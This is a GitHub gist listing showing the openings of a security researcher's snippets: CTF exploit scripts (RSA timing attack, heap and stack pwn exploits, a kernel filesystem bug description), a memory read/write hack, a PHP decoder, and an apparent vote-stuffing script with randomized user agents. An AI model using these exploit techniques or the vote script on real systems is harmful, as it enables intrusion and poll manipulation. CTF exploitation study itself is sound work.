Skip to content

Instantly share code, notes, and snippets.

View elnx's full-sized avatar
🖖
What's happening?

elnx

🖖
What's happening?
194 followers · 1.3k following
  • /dev/null
View GitHub Profile
@elnx
elnx / rsa_timing_attack_d_Montgomery.py
Created May 9, 2017 02:09 — forked from hellman/rsa_timing_attack_d_Montgomery.py
DEF CON 2017 Quals - Godzilla (Reverse/Crypto)
#-*- coding:utf-8 -*-
'''
DEF CON 2017 Quals - Godzilla (Reverse)
Timing attack on RSA decryption.
Based on http://www.cs.jhu.edu/~fabian/courses/CS600.624/Timing-full.pdf
Another solutions:
https://gist.github.com/nneonneo/367240ae2d8e705bb9173a49a7c8b0cd by b2xiao
https://gist.github.com/Riatre/caac24840b176cf843b3f66ad9a5eeaf by riatre
@elnx
elnx / vote.py
Created May 20, 2017 09:56 — forked from jackyyf/vote.py
Gist by paste.py @ 2017-05-12 02:48:45.276199
import requests
import gevent
from gevent import monkey; monkey.patch_all(); del monkey
import random
import time
concurrent = 8
delay = 0.5
def get_user_agent():
@elnx
elnx / rdwr.py
Created July 13, 2017 08:59 — forked from vagelim/rdwr.py
Direct read/write access to Python's memory
#
# read/write access to python's memory, using a custom bytearray.
# some code taken from: http://tinyurl.com/q7duzxj
#
# tested on:
# Python 2.7.10, ubuntu 32bit
# Python 2.7.8, win32
#
# example of correct output:
# inspecting int=0x41424344, at 0x0228f898
@elnx
elnx / vwdecode.php
Created July 17, 2017 08:00 — forked from Wind4/vwdecode.php
威盾PHP加密专家解密算法 By:Neeao
<?php
/***********************************
* 威盾PHP加密专家解密算法 By:Neeao
* http://Neeao.com
* 2009-09-10
***********************************/
$filename="index.php";//要解密的文件
$lines = file($filename);//0,1,2行
@elnx
elnx / half_ppp_new.py
Created August 2, 2017 07:12
#!/usr/bin/env python
# coding:utf-8
import sys
import time
from pwn import *
from clemency import *
def exploit(host):
@elnx
elnx / doit
Created December 29, 2017 22:47 — forked from eboda/doit
34C3 CTF minbashmaxfun exploit
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh )
@elnx
elnx / .tmux.conf
Created March 1, 2018 07:12
# Use UTF8
#set -g utf8
#set -g status-utf8 on
#setw -g utf8 on
# Use zsh as default shell
set-option -g default-shell /bin/zsh
# Support for 256 colors
set -g default-terminal "screen-256color"
@elnx
elnx / heapstorm2.py
Created April 2, 2018 03:10 — forked from Jackyxty/heapstorm2.py
Official solution for "Heap Storm II" of 0CTF/TCTF 2018 Quals
#!/usr/bin/env python
# encoding: utf-8
#flag{Seize it, control it, and exploit it. Welcome to the House of Storm.}
import itertools
from hashlib import sha256
from pwn import remote, process, ELF
from pwn import context
from pwn import p32,p64,u32,u64
@elnx
elnx / zerofs.c
Created April 2, 2018 03:11 — forked from tarafans/zerofs.c
zerofs.c
/*
config: KASLR + SMEP + RANDOM_STRUCT
In llseek, I only check whether the offset is smaller than file_size or not.
However, the image can be crafted by the attacker. After reversing the disk
layout of the image, the attacker can mount an image which contains a normal
file having file size 0x7fffffffffffffff.
With llseek, kernel memory read and write can be achieved.
But the implemented llseek only supports positive seeking, which means that
the attacker cannot access the data before the buffer of the file.
This creates certain difficulties.
@elnx
elnx / babystack.py
Last active April 4, 2018 10:25
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
code = ELF('./babystack')
context.arch = code.arch
context.log_level = 'debug'
gadget = lambda x: next(code.search(asm(x, os='linux', arch=code.arch)))
if len(sys.argv) > 2:
r = remote(sys.argv[1], int(sys.argv[2]))